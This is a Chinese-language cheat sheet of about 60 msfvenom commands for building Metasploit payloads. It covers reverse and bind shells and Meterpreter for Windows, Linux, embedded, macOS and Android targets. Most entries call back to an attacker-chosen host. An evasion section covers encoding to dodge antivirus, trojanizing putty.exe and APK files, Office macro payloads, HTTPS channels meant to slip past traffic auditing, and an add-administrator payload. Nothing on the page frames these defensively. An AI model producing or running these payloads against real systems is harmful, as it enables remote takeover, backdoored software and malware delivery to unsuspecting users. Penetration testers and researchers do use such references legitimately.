Msfvenom Cheatsheet

精选 70+ 条 Metasploit 框架下的 Payload 生成命令,涵盖各种平台、架构与高级绕过技巧。

基础查询 (Query)

列出所有可用 Payload
msfvenom -l payloads
已复制到剪贴板
列出所有编码器 (Encoders)
msfvenom -l encoders
已复制到剪贴板
列出所有支持的输出格式
msfvenom -l formats
已复制到剪贴板
列出所有支持的平台
msfvenom -l platforms
已复制到剪贴板
查看特定 Payload 的详细配置参数
msfvenom -p <payload> --list-options
已复制到剪贴板
查看完整帮助信息
msfvenom --help
已复制到剪贴板

Windows 常用反弹壳

x86 Staged Meterpreter
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
已复制到剪贴板
x86 Stageless Meterpreter
msfvenom -p windows/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
已复制到剪贴板
x64 Staged Meterpreter
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell64.exe
已复制到剪贴板
x64 Stageless Meterpreter
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell64.exe
已复制到剪贴板
HTTPS 加密通道 (绕过流量审计)
msfvenom -p windows/meterpreter/reverse_https LHOST=<IP> LPORT=443 -f exe > https.exe
已复制到剪贴板
x86 Staged CMD 反弹
msfvenom -p windows/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
已复制到剪贴板
x86 Stageless CMD 反弹
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell.exe
已复制到剪贴板
x64 Staged CMD 反弹
msfvenom -p windows/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell64.exe
已复制到剪贴板
x64 Stageless CMD 反弹
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe > shell64.exe
已复制到剪贴板
纯 PowerShell 反弹脚本
msfvenom -p windows/powershell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f psh > rev.ps1
已复制到剪贴板
使用 Shikata_ga_nai 编码 5 次
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -e x86/shikata_ga_nai -i 5 -f exe > encoded.exe
已复制到剪贴板

Linux 常用反弹壳

x86 Staged Meterpreter
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
已复制到剪贴板
x86 Stageless Meterpreter
msfvenom -p linux/x86/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
已复制到剪贴板
x64 Staged Meterpreter
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell64.elf
已复制到剪贴板
x64 Stageless Meterpreter
msfvenom -p linux/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell64.elf
已复制到剪贴板
x64 Staged Shell 反弹
msfvenom -p linux/x64/shell/reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
已复制到剪贴板
x64 Stageless Shell 反弹
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf > shell.elf
已复制到剪贴板
Bash 反弹 Shell (通用)
msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh
已复制到剪贴板
Python 反弹 Shell (Unix)
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py
已复制到剪贴板
ARM64 (树莓派 4/移动设备)
msfvenom -p linux/aarch64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf
已复制到剪贴板
ARMLE (树莓派/路由器)
msfvenom -p linux/armle/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf
已复制到剪贴板
MIPSLE (路由器/嵌入式)
msfvenom -p linux/mipsle/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf
已复制到剪贴板
MIPSBE (大端序路由器)
msfvenom -p linux/mipsbe/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf
已复制到剪贴板
PowerPC (老旧服务器)
msfvenom -p linux/ppc/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f elf
已复制到剪贴板

脚本语言 / Web 壳

PHP Meterpreter (Web 上传)
msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.php
已复制到剪贴板
原生 PHP 反弹 Shell
msfvenom -p php/reverse_php LHOST=<IP> LPORT=<PORT> -f raw > rev.php
已复制到剪贴板
Java JSP 反弹 Shell (JSP 文件)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.jsp
已复制到剪贴板
Java JSP 反弹 Shell (WAR 包)
msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f war > shell.war
已复制到剪贴板
Python 反弹 Meterpreter
msfvenom -p python/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f raw > shell.py
已复制到剪贴板
Unix/Linux Python 反弹
msfvenom -p cmd/unix/reverse_python LHOST=<IP> LPORT=<PORT> -f raw > shell.py
已复制到剪贴板
Bash 反弹 Shell (Unix/Linux)
msfvenom -p cmd/unix/reverse_bash LHOST=<IP> LPORT=<PORT> -f raw > shell.sh
已复制到剪贴板
Windows PowerShell 反弹 BAT
msfvenom -p cmd/windows/reverse_powershell LHOST=<IP> LPORT=<PORT> -f raw > rev.bat
已复制到剪贴板

免杀与高级技巧

去除坏字符 (如空字节)
msfvenom ... -b '\x00\xff'
已复制到剪贴板
指定退出方式 (thread/process/seh)
msfvenom ... EXITFUNC=thread
已复制到剪贴板
Windows Bind TCP (目标监听)
msfvenom -p windows/shell/bind_tcp LHOST=<IP> LPORT=<PORT> -f exe > bind.exe
已复制到剪贴板
Bind TCP Shellcode (BOF 用)
msfvenom -a x86 --platform Windows -p windows/shell/bind_tcp -e x86/shikata_ga_nai -b '\x00' -f python -v notBuf
已复制到剪贴板
绑定到现有可执行文件 (如 Putty)
msfvenom -p windows/meterpreter/reverse_tcp -x putty.exe -k -f exe > evil.exe
已复制到剪贴板
生成反射注入用的 DLL
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll > meter.dll
已复制到剪贴板
生成 Office 宏病毒 (VBA) 代码
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f vba
已复制到剪贴板
生成 C 语言格式的 Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f c
已复制到剪贴板
生成 Python 格式的 Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f python
已复制到剪贴板
生成十六进制格式的 Shellcode
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f hex
已复制到剪贴板

其他实用 Payload

Android APK 控端
msfvenom -p android/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -o app.apk
已复制到剪贴板
Android 嵌入现有 APK
msfvenom -x template.apk -p android/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -o payload.apk
已复制到剪贴板
macOS Staged Meterpreter
msfvenom -p osx/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f macho > shell.macho
已复制到剪贴板
macOS Stageless Meterpreter
msfvenom -p osx/x64/meterpreter_reverse_tcp LHOST=<IP> LPORT=<PORT> -f macho > shell.macho
已复制到剪贴板
macOS Stageless Shell
msfvenom -p osx/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f macho > shell.macho
已复制到剪贴板
Windows 添加管理员用户
msfvenom -p windows/adduser USER=admin PASS=123456 -f exe > adduser.exe
已复制到剪贴板
测试用的消息弹窗 Payload
msfvenom -p windows/messagebox TEXT="Hacked!" -f exe > msg.exe
已复制到剪贴板